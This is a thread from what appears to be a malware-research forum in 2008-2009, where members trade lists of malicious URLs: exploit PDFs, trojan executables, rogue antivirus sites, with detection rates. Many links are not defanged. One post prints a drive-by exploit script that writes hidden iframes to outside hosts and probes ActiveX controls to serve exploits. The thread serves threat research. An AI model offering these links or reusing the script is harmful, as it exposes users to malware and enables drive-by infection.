hxxp://gtswiat.pl/grafika/gora2/ss/help.pdf
hxxp://hu1-hu1.cn/counter/getfile.php?f=pdf
hxxp://hu1-hu1.cn/counter/getfile.php?f=vispdf
hxxp://id-auto.ru/msn/pdf.php?id=14788
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=19622
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=221738
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=28617
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=6212
hxxp://lite.ff-freehosting.com/vip/pdf.php?id=8678
hxxp://lovekills.ru/kill/pdf.php?id=7323
hxxp://malemaleless.cn/adsl3/pdf.php
hxxp://onsline.com/spl/pdf.pdf
hxxp://ontilop.ru/.../sploits/test.pdf
hxxp://reddii.ru/traffic/sploit1/getfile.php?f=pdf
hxxp://reddii.ru/traffic/sploit1/getfile.php?f=vispdf
hxxp://soft.1clinux.ru/102.pdf
hxxp://srq3h.com/center/movies/images/xuk/help.pdf
hxxp://sunbizdirect.com/pdf.php?id=6626
hxxp://svinushka.net/forum/spl/pdf.pdf
hxxp://teentgp.cn/fiesta/pdf.php?id=16535
hxxp://v2bestcount.net/in/20/output.pdf
hxxp://v2statscount.net/in/34/output.pdf
hxxp://v2statscount.net/in/46/output.pdf
hxxp://v2statscount.net/in/65/output.pdf
hxxp://verzeih.com/state/2/cache/doc.pdf
hxxp://vn92.net/exp/14/pdf.php?id=3218
hxxp://vn92.net/exp/2/pdf.php?id=122
hxxp://vn92.net/exp/pdf.php?id=46688
hxxp://www.ivnnetwork.com/pdf.php?a=29826
hxxp://www.porngalleriesz.com/st/z/pdf.php?t=4&l=700
hxxp://ya-tracker.com/pdfdoc/flashba.pdf

...Hopefully these are enough pdf samples for people out there? ;)
Title: Re: daily something......
Post by: sowhat-x on November 10, 2008, 08:54:36 am
Quote
hxxp://bhxtakekep.net/loaderadv563.exe
hxxp://71.18.116.75/pz/nana.exe
hxxp://72.8.146.36/3.exe
hxxp://alwayssam.com/lal222.exe
hxxp://alwayssam.com/so7.exe
hxxp://www.alwayssam.com/x3.exe
Title: Re: daily something......
Post by: sowhat-x on November 10, 2008, 09:02:10 am
Small present for all malware hunters around...list is daily updated - have fun... :)
Quote
http://www3.malekal.com/exploit.txt

Credits for the hard work to be given were they should...and that is,to Malekal:
Quote
http://forum.malekal.com/index.php
Title: Re: daily something......
Post by: cjeremy on November 10, 2008, 09:30:38 pm
I am doing a short write up for my blog on the PDF exploits and was wondering if I could use some of these samples in my write up?  I will site source as MDL and the individuals that collected the samples such as sowhat if you all allow me to use them.  Just want to get your permissions before I do the write up, thanks in advance either way.
Title: Re: daily something......
Post by: sowhat-x on November 11, 2008, 12:32:48 am
cjeremy,you don't need to reference anyone,after all,
most of them were found simply via googling...then sorting/removing dupes etc...

When I stumble upon kinda large amounts of stuff,
that was already spotted and posted by other people in public,
(eg.like the referenced material above that was gathered by Malekal),
I personally always give the reference/credits/link to the post in question as well...
That is both for people to be able to follow over by themselves the updates there,
plus for common reasons of politeness obviously...and that's all there is to it.  :)

Waiting for a good write-up with detailed analysis over at Sudosecure ;)
Title: Re: daily something......
Post by: lanvin on November 12, 2008, 12:26:08 am
Small present for all malware hunters around...list is daily updated - have fun... :)
Quote
http://www3.malekal.com/exploit.txt

Credits for the hard work to be given were they should...and that is,to Malekal:
Quote
http://forum.malekal.com/index.php


Thank you :)
Title: Re: daily something......
Post by: sowhat-x on November 12, 2008, 06:11:45 pm
Quote
hxxp://ascoprguide.net/lel/load.php?xpl=pdf
It spawns 'load.exe'...Result: 6/35 (17.14%)
http://www.virustotal.com/analisis/d1e1d25d68004d4c8a3b2ad5e87174e9

Quote
hxxp://ascoprguide.net/lel/config/test.pdf
Result: 10/36 (17.14%)
http://www.virustotal.com/analisis/18a2be6aeec85eceea9ffa8fee14fb43

And it's EstDomains...from the same ip also:
Quote
hxxp://bestansia.net/lel/config/test.pdf
Result: 10/36 (27.78%)
http://www.virustotal.com/analisis/c529319c11a5eecb6318ecc2cfe6417f

Quote
hxxp://bestratebid.net/botout/test.pdf
Result: 12/36 (33.34%)
http://www.virustotal.com/analisis/2d33f75cf7dda11517a955de05bf4b00

Quote
hxxp://bestratebid.net/botout/load.php?xpl=mdac
Result: 6/36 (16.67%)
http://www.virustotal.com/analisis/cd62f24af130e17769147181f78a3f81

No other domains seem to exist in this ip...
http://www.robtex.com/ip/64.86.16.11.html
Title: Re: daily something......
Post by: sowhat-x on November 13, 2008, 09:49:39 am
Code: [Select]
hxxp://59.34.197.63/exe1/b08.css
hxxp://59.34.197.63/exe1/b19.css
hxxp://59.34.197.63/exe1/bf.css
hxxp://59.34.197.63/exe1/bf.css
hxxp://59.34.197.63/exe1/ce.css
hxxp://59.34.197.63/exe1/ms.css
hxxp://59.34.197.63/exe1/re.css
hxxp://59.34.216.143/new/new34.exe
hxxp://59.34.216.143/new/new34.exe
hxxp://59.34.216.143/new/new35.exe
hxxp://59.34.216.143/new/new35.exe
hxxp://59.34.216.143/new/new36.exe
hxxp://59.34.216.225/new/new31.exe
hxxp://59.34.216.225/new/new32.exe
hxxp://59.34.216.225/new/new33.exe
hxxp://59.60.30.200/list/01.exe
hxxp://59.60.30.200/list/02.exe
hxxp://59.60.30.200/list/03.exe
hxxp://59.60.30.200/list/04.exe
hxxp://59.60.30.200/list/05.exe
hxxp://59.60.30.200/list/06.exe
hxxp://59.60.30.200/list/07.exe
hxxp://59.60.30.200/list/08.exe
hxxp://59.60.30.200/list/09.exe
hxxp://59.60.30.200/list/10.exe
hxxp://59.60.30.200/list/11.exe
hxxp://59.60.30.200/list/12.exe
hxxp://59.60.30.200/list/14.exe
hxxp://59.60.30.200/list/15.exe
hxxp://59.60.30.200/list/16.exe
hxxp://59.60.30.200/list/17.exe
hxxp://59.60.30.200/list/18.exe
hxxp://59.60.30.200/list/19.exe
hxxp://59.60.30.200/list/20.exe
hxxp://59.60.30.200/list/21.exe
hxxp://59.60.30.200/list/22.exe
hxxp://59.60.30.200/list/24.exe
hxxp://59.60.30.200/list/25.exe
hxxp://59.60.30.200/list/26.exe
hxxp://59.60.30.200/list/27.exe
hxxp://59.60.30.200/list/csmonet.exe
hxxp://59.60.30.200/list/msconet.exe
hxxp://61.160.210.41/new/new27.exe
hxxp://61.160.210.41/new/new28.exe
hxxp://61.160.210.41/new/new29.exe
hxxp://61.160.210.41/new/new30.exe
hxxp://61.160.210.42/new/new21.exe
hxxp://61.160.210.42/new/new22.exe
hxxp://61.160.210.42/new/new23.exe
hxxp://61.160.210.42/new/new24.exe
hxxp://61.160.210.42/new/new25.exe
hxxp://61.160.210.42/new/new26.exe
hxxp://61.160.210.43/new/new11.exe
hxxp://61.160.210.43/new/new12.exe
hxxp://61.160.210.43/new/new13.exe
hxxp://61.160.210.43/new/new15.exe
hxxp://61.160.210.44/new/new16.exe
hxxp://61.160.210.44/new/new17.exe
hxxp://61.160.210.44/new/new18.exe
hxxp://61.160.210.44/new/new19.exe
hxxp://61.160.210.44/new/new20.exe
hxxp://61.160.213.143/mb.txt
hxxp://61.164.118.209/new/new1.exe
hxxp://61.164.118.209/new/new10.exe
hxxp://61.164.118.209/new/new2.exe
hxxp://61.164.118.209/new/new3.exe
hxxp://61.164.118.209/new/new4.exe
hxxp://61.164.118.209/new/new5.exe
hxxp://61.164.118.209/new/new8.exe
hxxp://61.164.118.209/new/new9.exe
hxxp://61.164.118.211/new/new10.exe
hxxp://61.164.118.211/new/new6.exe
hxxp://61.164.118.211/new/new7.exe
hxxp://61.164.118.211/new/new8.exe
hxxp://61.164.118.211/new/new9.exe
hxxp://ad.uu500.com/3d226f621b4a032c.exe
hxxp://dddd.nihao69.cn/down/ko.exe
hxxp://down.cvz2.cn/hb/0.exe
hxxp://down.cvz2.cn/hb/1.exe
hxxp://down.cvz2.cn/hb/10.exe
hxxp://down.cvz2.cn/hb/11.exe
hxxp://down.cvz2.cn/hb/12.exe
hxxp://down.cvz2.cn/hb/13.exe
hxxp://down.cvz2.cn/hb/14.exe
hxxp://down.cvz2.cn/hb/15.exe
hxxp://down.cvz2.cn/hb/16.exe
hxxp://down.cvz2.cn/hb/17.exe
hxxp://down.cvz2.cn/hb/18.exe
hxxp://down.cvz2.cn/hb/19.exe
hxxp://down.cvz2.cn/hb/2.exe
hxxp://down.cvz2.cn/hb/20.exe
hxxp://down.cvz2.cn/hb/21.exe
hxxp://down.cvz2.cn/hb/22.exe
hxxp://down.cvz2.cn/hb/24.exe
hxxp://down.cvz2.cn/hb/25.exe
hxxp://down.cvz2.cn/hb/26.exe
hxxp://down.cvz2.cn/hb/27.exe
hxxp://down.cvz2.cn/hb/28.exe
hxxp://down.cvz2.cn/hb/29.exe
hxxp://down.cvz2.cn/hb/3.exe
hxxp://down.cvz2.cn/hb/30.exe
hxxp://down.cvz2.cn/hb/31.exe
hxxp://down.cvz2.cn/hb/32.exe
hxxp://down.cvz2.cn/hb/33.exe
hxxp://down.cvz2.cn/hb/4.exe
hxxp://down.cvz2.cn/hb/5.exe
hxxp://down.cvz2.cn/hb/6.exe
hxxp://down.cvz2.cn/hb/7.exe
hxxp://down.cvz2.cn/hb/8.exe
hxxp://down.cvz2.cn/hb/9.exe
hxxp://down.nihao69.cn/down/ko.exe
hxxp://eiv.baidu.com/other/ff.js
hxxp://facaizhifuok.cn/root/svcos.exe
hxxp://m.c5x8.com/mm.exe
hxxp://qq.caogui03.cn/cha/ca01.exe
hxxp://qq.caogui03.cn/ma/cw01.exe
hxxp://qq.caogui03.cn/ma/cw02.exe
hxxp://qq.caogui03.cn/ma/cw03.exe
hxxp://qq.caogui03.cn/ma/cw04.exe
hxxp://qq.caogui03.cn/ma/cw05.exe
hxxp://qq.caogui03.cn/ma/cw06.exe
hxxp://qq.caogui03.cn/ma/cw07.exe
hxxp://qq.caogui03.cn/ma/cw08.exe
hxxp://qq.caogui03.cn/ma/cw09.exe
hxxp://qq.caogui03.cn/ma/cw10.exe
hxxp://qq.caogui03.cn/ma/cw11.exe
hxxp://qq.caogui03.cn/ma/cw12.exe
hxxp://qq.caogui03.cn/ma/cw14.exe
hxxp://qq.caogui03.cn/ma/cw15.exe
hxxp://qq.caogui03.cn/ma/cw16.exe
hxxp://qq.caogui03.cn/ma/cw17.exe
hxxp://qq.caogui03.cn/ma/cw18.exe
hxxp://qq.caogui03.cn/ma/cw19.exe
hxxp://qq.caogui03.cn/ma/cw20.exe
hxxp://qq.caogui03.cn/ma/cw21.exe
hxxp://qq.caogui03.cn/ma/cw22.exe
hxxp://qq.caogui03.cn/ma/cw23.exe
hxxp://qq.caogui03.cn/ma/cw25.exe
hxxp://qq.caogui03.cn/ma/cw26.exe
hxxp://qq.caogui03.cn/ma/cw28.exe
hxxp://qq.caogui03.cn/ma/cw29.exe
hxxp://qq.caogui03.cn/ma/cw30.exe
hxxp://qq.caogui03.cn/ma/cw31.exe
hxxp://qq.caogui03.cn/ma/sw02.exe
hxxp://qq.caogui03.cn/ma/sw03.exe
hxxp://tom.tom63.cn/liebiao/new.txt
hxxp://tom.tom63.cn/list/01.exe
hxxp://tom.tom63.cn/list/02.exe
hxxp://tom.tom63.cn/list/03.exe
hxxp://tom.tom63.cn/list/04.exe
hxxp://tom.tom63.cn/list/05.exe
hxxp://tom.tom63.cn/list/06.exe
hxxp://tom.tom63.cn/list/07.exe
hxxp://tom.tom63.cn/list/08.exe
hxxp://tom.tom63.cn/list/09.exe
hxxp://tom.tom63.cn/list/10.exe
hxxp://tom.tom63.cn/list/11.exe
hxxp://tom.tom63.cn/list/12.exe
hxxp://tom.tom63.cn/list/14.exe
hxxp://tom.tom63.cn/list/15.exe
hxxp://tom.tom63.cn/list/16.exe
hxxp://tom.tom63.cn/list/17.exe
hxxp://tom.tom63.cn/list/18.exe
hxxp://tom.tom63.cn/list/19.exe
hxxp://tom.tom63.cn/list/20.exe
hxxp://tom.tom63.cn/list/21.exe
hxxp://tom.tom63.cn/list/22.exe
hxxp://tom.tom63.cn/list/24.exe
hxxp://tom.tom63.cn/list/25.exe
hxxp://tom.tom63.cn/list/26.exe
hxxp://txt.50nb.com/update/cs.txt
hxxp://u.uu500.com/a8da234k8asdf.exe
hxxp://ulm-haafeulm-haa.com/blotch/0610.bin
hxxp://www.asmkuang.cn/1.exe
hxxp://www.asmkuang.cn/2/m15.swf
hxxp://www.asmkuang.cn/2/m16.swf
hxxp://www.asmkuang.cn/2/m28.swf
hxxp://www.asmkuang.cn/2/m45.swf
hxxp://www.asmkuang.cn/2/m47.swf
hxxp://www.asmkuang.cn/2/m64.swf
hxxp://www.dabao8.net/ma.exe
hxxp://www.deewoo.net/dl.exe
hxxp://www.deewoo.net/gside.exe
hxxp://www.ffxihn.com/yy/yy.exe
hxxp://www.flash-install.com/Adobe_flash_codec.exe
hxxp://www.flash-install.com/video.swf
hxxp://www.kaolabao.net/bo/BO1024.exe
hxxp://www.kaolabao.net/bo/update.ini
hxxp://www.longlong7.cn/bo/BO1030.exe
hxxp://www.oiuyt.net/ad.jpg
hxxp://www.oiuytr.net/down/ko.exe
hxxp://www.oiuytr.net/new/a255.css
hxxp://www.play0nlink.com/ma/xia.exe
hxxp://www.wq9q.cn/root/svcos.exe
hxxp://www.yipinci.com/upfile/vip.exe
hxxp://www.youxi668.com/ie7.exe
hxxp://www.zyy9888.net/test/13.exe
hxxp://x.ccd6.com/dd/1.exe
hxxp://x.ccd6.com/dd/10.exe
hxxp://x.ccd6.com/dd/2.exe
hxxp://x.ccd6.com/dd/6.exe
hxxp://x.ccd6.com/dd/9.exe
hxxp://x.ccd6.com/dd/x.gif
hxxp://x.ccd6.com/xx.exe

Quote
hxxp://2.gooanal.net/sis/getfile.php?f=pdf
Result: 9/36 (25.00%)
http://www.virustotal.com/analisis/70473d5c4c6da5906a23e02a06aa38f5

Quote
hxxp://dortumosio.com/11/pdf.php
Result: 11/36 (30.56%)
http://www.virustotal.com/analisis/4ac9dbbd008674a3608d641a6901baa1
Title: Re: daily something......
Post by: lanvin on November 14, 2008, 03:04:35 pm
Code: [Select]
http://msaknust.com/images/menu.jpg  (C:\Windows\BitDefender.exe)
http://www.comprafacilsac.com/r1.exe
https://www.box.net/shared/static/kiur88kidh.exe
http://www.playitontheweb.com/01/img/amigo.exe
http://www.cobrancasweb.com/imagens/imagem.jpg
http://www.cobrancasweb.com/imagens/imagem1.jpg
http://www.oiuytre.net/down/ko.exe
http://www.mensagemevangelica.com.br/download/biblia_digital.exe
http://server.microlite20.com/~admin271/ldr.exe
http://www.staffcop.com/download/staffcop.exe

http://77.93.75.148/img/cntr.dll?sid=D8545F5A4F080F0F000D54585C59595D5D4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D545D282F582F5C2C2B5E585B285D50285D502F2B5128582C5E5D5E2A585A5F5C2C4F081D54502A285A515C5959505F2C5B58582D2D50505D50585C59595D5D282A2F2F2F2F4F1E1D545E505D5B5C0C5B5E59584F0B00545A5B594F04061B1901000D54001B185D4F1B0C1F000D54505D5C5D69B101

http://77.93.75.148/img/cntr.dll?sid=6E545F5A4F080F0F000D54585F5F5A51514F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495A4F0A000D545C2F2B5C502B5150595E5E2B5D2B59502B5A2C282B5F50582B2D585E5E502F5C4F081D545D5C592A2F2A5A59505E5A2D58582D2D50585F59585F5F5A5151282A2F2F2F2F4F1E1D545D5D0B5E5C0C5B5E59584F0B00545A5B594F04061B1901000D54001B185D4F1B0C1F000D54505D5B5F690701

http://77.93.75.148/img/cntr.dll?sid=E0545F5A4F080F0F000D54585F5F5A51514F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495A4F0A000D545E5D502C505C5C5E595B2D285D2F5E2D282A2B5B2D502B2B2F515F2A2F582B504F081D542C2F2F5D2C2F5B5F505F2D2F58582D2D2B5E2C2A585F5F5A5151282A2F2F2F2F4F1E1D54510A0B0B5C0C5B5E59584F0B00545A5B594F04061B1901000D54001B185D4F1B0C1F000D54505D5B5F698901

http://85.17.166.232/form/index.dll?setid=irq4&affid=164573&uid=F12497C0820D11DD9EE5164573CFFFFF&rid=zdez&guid=3B2EA59765304A519BF58B34667106AA

http://85.17.166.232/form/index.dll?setid=an2g&affid=166350&uid=B6D91FFC927D11DD85CB166350CFFFFF&rid=gl2vmclr&guid=251CCB529BF24D359ABDF4494AE0949E

http://85.17.166.232/form/index.dll?setid=irq4&affid=150044&uid=13B8E62A758811DD84E5150044CFFFFF&rid=zdez&guid=605760C6C2F54BBF8701D02E80E28BEC

http://scanner.rapid-antivirus.com/setup/install_4746_NnwzNnwxMDIwMDAwMDAwfHx8fHx8fHw_.exe
http://iabestscan.com/common/destrub.js
Title: Re: daily something......
Post by: SysAdMini on November 14, 2008, 03:54:16 pm
Code: [Select]
91.203.93.61/25/2/getfile.php?f=pdf
beshragos.com/work/getfile.php?f=pdf

and some more in this nice article

http://ddanchev.blogspot.com/2008/11/embassy-of-brazil-in-india-compromised.html (http://ddanchev.blogspot.com/2008/11/embassy-of-brazil-in-india-compromised.html)
Title: Re: daily something......
Post by: SysAdMini on November 19, 2008, 08:04:08 pm
Code: [Select]
hxxp://uin5.cn
Code: [Select]
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<Iframe src=http://sllwbd2.cn/a1/ilink.html width=100 height=0></Iframe>");
}
else{document.write("<Iframe src=http://sllwbd2.cn/a1/flink.html width=100 height=0></Iframe>");}
}
document.writeln("<Iframe src=http:\/\/www.zghncsq.cn\/b2.htm width=50 height=0><\/iframe>")

Code: [Select]
hxxp://sllwbd2.cn/a1/ilink.html
hxxp://sllwbd2.cn/a1/flink.html
contain some flash exploits


http://www.virustotal.com/analisis/9bc0c8341d75029f720ae8bccb382691 14/36
http://www.virustotal.com/analisis/366887d40b9994e8652cbe7961fefcf6 14/36
http://www.virustotal.com/analisis/b4fe9309a779516d75886e3222f975b2 14/36
http://www.virustotal.com/analisis/b3618fd15fc152e18089c22a9c97fb65 14/36
http://www.virustotal.com/analisis/18634c476617d3855b49a3901437389d 14/36

Code: [Select]
hxxp://www.zghncsq.cn/b2.htmtakes you to
Code: [Select]
hxxp://sllwbd2.cn/a1/fxx.htmwith some more exploits
Code: [Select]
<script>
document.write("<iframe width=100 height=0 src=fx.htm></iframe>");
document.write("<iframe width=100 height=0 src=ss.html></iframe>");
window.status="═ŕ│╔";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=50 height=0 src=MS06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};                     
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=http://sllwbd2.cn/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxaaaa";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("");
document.write("<iFrame width=100 height=0 src=http://sllwbd2.cn/UU.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("DPClient.Vod");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=Thunder.html></iframe>");}}
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="\x36\x2e\x30\x2e\x31\x34\x2e\x35\x35\x32")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=Real.html></iframe>");
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";document.write("");
</script>

ends up in
Code: [Select]
hxxp://www.oiuytr.net/new/a11.csshttp://www.virustotal.com/analisis/8ae968467b62acf4b9196cd8f6c287f6
Title: Re: daily something......
Post by: sowhat-x on November 20, 2008, 06:38:23 pm
Quote
hxxp://sutra2s.info/in.cgi?16
hxxp://www.qualityvidz.com/index.php?id=1133&style=black
hxxp://www.wmpinstrument.com/download.php?id=1133
hxxp://porntube08.com/?t_type=amateurs&id=1264
hxxp://cleanlive.net/download/FlashPlayer.v1.264.exe

Quote
hxxp://mycigarworld.info/in.cgi?16
hxxp://mymostprivatevideo.com/exclusive2/id/3913000/2/black/white/
hxxp://softwareformyvideo.com/exe2/3913000.exe

Quote
hxxp://ieskok.info/in.cgi?6
hxxp://video-4.lovimomentinaslazdaisia.com/
hxxp://scan.scannerantispyware.com/419/6/
hxxp://files.downloadproas2009.com/load/setup_419_6777_.exe

Quote
hxxp://fastfind.info/in.cgi?17
hxxp://my-tubemovies-collection.com/promo2/?wmid=328
hxxp://my-tubemovies-collection.com/promo2/get.php?wmid=328&softname=full_dvd_video

Quote
hxxp://seaarch.info/in.cgi?11&group=2
hxxp://antivirusdefense.com/2009/1/en/freescan.php?id=77053501
hxxp://antivirusdefense.com/2009/download/trial/A9installertest_77053501.exe

Quote
hxxp://skyyy.info/in.cgi
hxxp://www.movzline.com/m5/index.php?id=1387&n=teen&a=usagi&v=309466.88888889
hxxp://www.wmpinstrument.com/download.php?id=1387
Title: Re: daily something......
Post by: lanvin on November 25, 2008, 06:52:33 pm
hxxp://upload.turkbaze.org/1337.exe
hxxp://www.searchcasino.net/everestpoker/download/EverestPoker.exe
hxxp://files.brothersoft.com/chat/miscellaneous/zango.im%20Installer79.exe
hxxp://files.brothersoft.com/games/action/Alien_Shooter_56025.exe
hxxp://files.brothersoft.com/dvd_video/misc_multimedia/regular_plugin.exe
hxxp://files.brothersoft.com/business/accounting_software/1_4_all_Account_lite-install-14218.exe
hxxp://jp.brothersoft.com/upload/13/6255.20071120051301.exe
hxxp://files7.brothersoft.com/utilities/optimize_utilities/mechanic.exe
hxxp://files4.brothersoft.com/chat_e-mail/misc_chat/MyEmoticons.exe
hxxp://files5.brothersoft.com/internet/p2p_file_sharing/KDM-Setup.exe
hxxp://www.indev.no/FlashMute_2.exe
hxxp://www.spytech-web.com/spytechonline/Files/spyagent6.zip
hxxp://files.brothersoft.com/RegNow/xpadvancedkeylogger.exe
hxxp://vip-files.brothersoft.com/ek_setup.exe
hxxp://www.widestep.com/files/ek_setup.exe
hxxp://vip-files.brothersoft.com/keysetup.exe
hxxp://msn-checker-sniffer.jp.brothersoft.com/upload/17/8125.20071115231113.exe
hxxp://files.brothersoft.com/RegNow/modemspy.exe
hxxp://www.brothersoft.com/soft/regnow/sasetup19793.exe
hxxp://files.brothersoft.com/security/keylogger/SoftForYou_Keylogger_33203.exe
hxxp://chariot.tucows.com/files7/Anti_Virus.exe
hxxp://files.brothersoft.com/wallpaper/miscellaneous/wallpaper.exe
hxxp://download.speedbit.com/dap86-bros.exe 
hxxp://files.brothersoft.com/dvd_video/misc_multimedia/regular_plugin.exe 
hxxp://www.pchell.com/downloads/uninstall2.exe
hxxp://www.pchell.com/downloads/lopuninstall.exe
hxxp://www.pchell.com/checkout.shtml16845/IncrediUninstaller.exe

Title: Re: daily something......
Post by: lanvin on December 27, 2008, 03:56:30 pm
Code: [Select]
http://111.vvvbw.cn/new/new1.exe
http://111.vvvbw.cn/new/new2.exe
http://111.vvvbw.cn/new/new3.exe
http://111.vvvbw.cn/new/new4.exe
http://111.vvvbw.cn/new/new5.exe
http://111.vvvbw.cn/new/new6.exe
http://111.vvvbw.cn/new/new7.exe
http://111.vvvbw.cn/new/new8.exe
http://111.vvvbw.cn/new/new9.exe
http://222.vvvbw.cn/new/new11.exe
http://222.vvvbw.cn/new/new12.exe
http://222.vvvbw.cn/new/new13.exe
http://222.vvvbw.cn/new/new14.exe
http://222.vvvbw.cn/new/new15.exe
http://222.vvvbw.cn/new/new16.exe
http://222.vvvbw.cn/new/new17.exe
http://222.vvvbw.cn/new/new18.exe
http://222.vvvbw.cn/new/new19.exe

http://333.vvvbw.cn/new/new21.exe
http://333.vvvbw.cn/new/new22.exe
http://333.vvvbw.cn/new/new23.exe
http://333.vvvbw.cn/new/new24.exe
http://333.vvvbw.cn/new/new25.exe
http://333.vvvbw.cn/new/new26.exe
Title: Re: daily something......
Post by: bobby on January 02, 2009, 10:30:29 am
Code: [Select]
epeiy.com/wssl713fro.exe
http://www.virustotal.com/analisis/303be708a68899d8f1bad9591b9b4f89
Title: Re: daily something......
Post by: sparsha on January 06, 2009, 03:14:01 pm
Sites related to Rogue Apps
Code: [Select]
hxxp://antivirusplus2009.com
hxxp://Antivirus-plus-2009.com
hxxp://Av-online-scan.org
hxxp://spyprotector-pro.com/install.exe
hxxp://sys-scanner.com
hxxp://traffchecking.com/warning/
hxxp://virusandspywarescaning.com
hxxp://watchnetprotection.com/scan/index.php?affid=00200
hxxp://whereismyclick.cn/soft.php?aid=0869&d=1&product=XPA
hxxp://pc-security-scanner.com/2009/1/en/_freescan.php?nu=77001101
Title: Re: daily something......
Post by: SysAdMini on January 06, 2009, 08:55:56 pm
Sites related to Rogue Apps

Added to list.
Title: Re: daily something......
Post by: SysAdMini on January 07, 2009, 06:17:38 pm
Code: [Select]
http://www.bm-740.cn/new/new1.exe
..
http://www.bm-740.cn/new/new24.exe

http://www.threatexpert.com/report.aspx?md5=16146737ffcd2c74d7dd9e7881056172
Title: Re: daily something......
Post by: sparsha on January 11, 2009, 03:17:52 pm
more rogue apps related sites

Code: [Select]
http://files.proantispyware2009dl.com/load/setup_225_3777_.exe
http://int.proas2009report1.com/stat.php?func=installrun&id=241&landing=3777&lang=EN&sub=0&notstat=1
http://dl.storage-proas2009.com/get/?type=main&pin=241&lnd=3777

files.avnanodl.com/load/setup_243_3777_.exe
http://int.nanoantreport.com/stat.php?func=installrun&id=243&landing=3777&lang=EN&sub=0
http://dl.nanoantexe.com/get/?type=main&pin=243&lnd=3777

real-av.org
http://lsp-test-nax.ind.in/winlogon.htm
http://pmsoftware.biz/cgi-bin/lsp.pl?code=15
proantiviruspcscan.com


http://becomepoweruser.cn/soft.php?aid=0754&d=1&product=XPA
http://best-antivirus-scanner.com/2009/1/freescan.php?nu=77001101
http://clickoverridesystem.cn/soft.php?aid=0754&d=1&product=XPA
http://defendedsystemuser.cn/soft.php?aid=0754&d=1&product=XPA
bestantivirusproscanner.com/2009/1/freescan.php?nu=77001101
livepcantivirusscan.com
http://protectedonlinepayments.com
http://protectionauditview.cn/2008/update.php?ver=
http://securedclickuse.cn/soft.php?aid=0754&d=1&product=XPA
http://securedwwwclicks.com/soft.php?aid=0754&d=1&product=XPA
http://styleonlyclicks.cn/soft.php?aid=0754&d=1&product=XPA
http://trustourclicks.cn/soft.php?aid=0754&d=1&product=XPA
http://whereismyclick.cn/soft.php?aid=0754&d=1&product=XPA

Title: Re: daily something......
Post by: SysAdMini on January 11, 2009, 08:17:39 pm
more rogue apps related sites

Thank you. Added to list.
Title: Re: daily something......
Post by: sparsha on January 13, 2009, 09:27:02 am
AV2009 rogue sites: This gang is changing fake/scare scanner sites very frequently  >:(

Code: [Select]

http://bestantivirusdefense.com/2009/1/freescan.php?nu=77001101
http://privatewebsystemupdate.com/download/av_2009glof.exe

Title: Re: daily something......
Post by: sparsha on January 15, 2009, 05:26:20 pm
Spyware Protect 2009 related sites:

Code: [Select]
av10antivir.com/free_scan.exe
sp-protect2009.com
spwprotect2009.com
spyprotect2009.com
spywprotect2009.com
Spywprotect.com
swp2009.com
Title: Re: daily something......
Post by: SysAdMini on January 18, 2009, 05:34:15 pm
exploits/trojans

starting at
Code: [Select]
http://www.44aaaa.com/
redirects to urls where css files are trojans
Code: [Select]
http://www.44aaaa.com/aa.htm
http://daoye.nm.cn/a38_1104/new.html
http://daoye.nm.cn/real.html
http://user666.66-18.net/re11.css
http://daoye.nm.cn/real.htm
http://user666.66-18.net/re10.css
http://daoye.nm.cn/yy456.htm
http://user666.66-18.net/lz.css
http://daoye.nm.cn/yy123.htm
http://user666.66-18.net/bfyy.css
http://daoye.nm.cn/no.htm
http://user666.66-18.net/no.css
http://daoye.nm.cn/sms.htm
http://user666.66-18.net/sms.css
http://daoye.nm.cn/for.htm
http://user666.66-18.net/for.css
http://daoye.nm.cn/a38_1104/what.htm
http://user666.66-18.net/a38.css
http://daoye.nm.cn/a38_1104/who.htm
Title: Re: daily something......
Post by: SysAdMini on January 19, 2009, 11:24:17 am
Code: [Select]
www.wixks.com/new/new1.exe
www.wixks.com/new/new2.exe
www.wixks.com/new/new3.exe
www.wixks.com/new/new4.exe
www.wixks.com/new/new5.exe
www.wixks.com/new/new6.exe
www.wixks.com/new/new7.exe
www.wixks.com/new/new8.exe
www.wixks.com/new/new9.exe
www.wixks.com/new/new10.exe
www.wixks.com/new/new11.exe
www.wixks.com/new/new12.exe
www.wixks.com/new/new13.exe
www.wixks.com/new/new14.exe
www.wixks.com/new/new15.exe
www.wixks.com/new/new16.exe
www.wixks.com/new/new17.exe
www.wixks.com/new/new18.exe
www.wixks.com/new/new19.exe
www.wixks.com/new/new20.exe
www.wixks.com/new/new21.exe
www.wixks.com/new/new22.exe
www.wixks.com/new/new23.exe
www.wixks.com/new/new24.exe
www.wixks.com/new/new25.exe
www.wixks.com/new/new26.exe
Title: Re: daily something......
Post by: sparsha on January 21, 2009, 12:05:57 pm
"XP Protection Center"

braviax/brastk advertised rogue

Code: [Select]
http://Xp-protcenter.com/install/Installer.exe
